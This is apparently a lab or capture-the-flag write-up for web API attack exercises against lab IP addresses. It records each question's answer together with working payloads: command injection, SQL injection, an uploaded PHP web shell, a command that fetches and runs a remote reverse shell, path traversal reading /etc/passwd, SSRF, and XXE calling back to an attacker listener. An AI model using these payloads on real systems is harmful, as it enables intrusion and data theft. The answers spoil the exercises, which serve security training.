Exploit the command injection vulnerability of the target to execute an "id" command. Submit the privileges under which the server is running as your answer. Answer options (without quotation marks): "user", "www-data", "root"
Copy http://10.129.100.72:3003/ping-server.php/system/id
uid=0(root) gid=0(root) groups=0(root)
To execute commands featuring arguments via http://:3003/ping-server.php/system/{cmd} you may have to use ______. Answer options (without quotation marks): "Encryption", "Hashing", "URL Encoding"
URL encoding
What is the username of the third user (id=3)?
Copy └─$ curl http://10.129.100.72:3003/?id=3
[{"id":"3","username":"WebServices","position":"3"}]
Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer.
Copy http://10.129.100.72:3003/?id=1%20or%201=1%20--%20true
Achieve remote code execution and submit the server's hostname as your answer.
Copy upload shell.php
http://10.129.100.72:3001/uploads/shell.php?cmd=id
Shelluid=0(root) gid=0(root) groups=0(root)
http://10.129.100.72:3001/uploads/shell.php?cmd=curl%20http://10.10.14.15/php-reverse-shell.php|php
LFI
Copy ffuf -w "SecLists-master/Discovery/Web-Content/common-api-endpoints-mazen160.txt" -u 'http://10.129.100.72:3000/api/FUZZ'
[Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 295ms]
* FUZZ: download
http://10.129.100.72:3000/api/download
curl "http://10.129.100.72:3000/api/download/..%2f..%2f..%2f..%2fetc%2fhosts"
curl "http://10.129.100.72:3000/api/download/..%2f..%2f..%2f..%2fetc%2fpasswd"
Through the LFI vulnerability identify an existing user on the server whose name starts with "ub". Answer format: ub****
ubuntu
SSRF:
Can you leverage the SSRF vulnerability to identify port 3002 listening locally on the web server? Answer format: Yes, No
Copy curl http://10.129.202.133:3000/api/userinfo
curl "http://10.129.100.72:3000/api/userinfo?id=http://127.0.0.1:3002"
XXE Injection via API calls
Copy POST /api/login/ HTTP/1.1
Host: 10.129.100.72:3001
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 175
Origin: http://10.129.100.72:3001
Connection: close
Referer: http://10.129.100.72:3001/
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://10.10.14.15:8000"> ]>
<root><email>&somename;</email><password>admin</password></root>
nc -nlvp 8000
listening on [any] 8000 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.100.72] 60398
GET / HTTP/1.0
Host: 10.10.14.15:8000
Connection: close